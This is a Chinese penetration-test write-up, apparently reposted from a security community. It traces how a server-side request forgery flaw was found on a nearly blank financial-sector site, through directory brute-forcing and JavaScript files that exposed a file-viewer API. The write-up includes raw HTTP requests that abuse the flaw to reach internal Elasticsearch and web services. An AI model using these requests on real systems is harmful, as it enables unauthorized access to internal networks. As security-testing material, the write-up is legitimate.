空白页面第三讲

在某次金融类项目中，直接访问系统无任何功能，几乎相当于404 Not Found，甚至连JavaScript文件一个都不存在，最终通过渗透经验和一定的运气，拿下了这个高危SSRF漏洞。
直接访问页面404，给了一个url：http://xxx-desktop.xxx.com/

打开之后发现是白的，基本页面空白会加载一些js，直接查看源代码

发现其中有几个类似于接口一样的路径
libs/plugins/jquery.js
./html/apply.html?data=
cxx/token/decrypt
第一个jquery.js http://xxx-desktop.xxx.com/libs/plugins/jquery.js,大家都知道这个很有可能是前端信息所以我们不看
第二个html/apply.html?data=，加载了当前目录下一个html文件，路径为：http://xxx-desktop.xxx.com/html/apply.html?data=，原本以为有什么东西，访问一下，发现404

第三个cxx/token/decrypt，疑似接口路径，访问无果

都是404？就这样就完了么

http://xxx-desktop.xxx.com/html/
http://xxx-desktop.xxx.com/css/
http://xxx-desktop.xxx.com/js/
发现爆破出来的有403这不就是突破么
对html、css、js进行目录，在js下面发现了几个目录

http://xxx-desktop.xxx.com/js/apply.js
http://xxx-desktop.xxx.com/js/pagination.js
http://xxx-desktop.xxx.com/js/common.js
继续去访问每一个js，发现common.js里面有一个接口目录：/xxxapi，尼玛目录这么复杂恶心谁呢

在/js/apply.js中发现了系统接口：file/pdf/view?file=

将一级接口目录/xxxapi/与系统接口file/pdf/view?file=进行拼接，组成可用接口：
http://xxx-desktop.xxx.com/xxxapi/file/pdf/view?file=
并且发现JavaScript代码中的逻辑是：接口 + ecsUrl，因此猜测file参数为一个URL。
接下来尝试调用接口进行SSRF利用。
首先，使用VPS监听端口，尝试直接利用SSRF访问我们的端口，发现成功接收到了Java语言进行的HTTP请求
到现在证明漏洞存在，然后ssrf请求一下内网信息瞅瞅，之前已经拿到了部分内网资产，所以可以直接访问
测试访问内网Elasticsearch服务：http://10.x.x.191:9200
GET /xxxapi/file/pdf/view?file=http://10.x.x.191:9200/ HTTP/1.1
Host: xxx-desktop.xxx.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

测试访问内网Web应用服务：http://10.x.x.65:8081/
GET /xxxhapi/file/pdf/view?file=http://10.x.x.65:8081 HTTP/1.1
Host: xxx-desktop.xxx.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

结束测试，好了空白页面大概我就这样了，大家参考一下就好，菜鸡在这里求点赞，谢谢。

文字来源于- 火线 Zone-云安全社区，安全小天地只做文章分享，如有侵权，请联系站长删除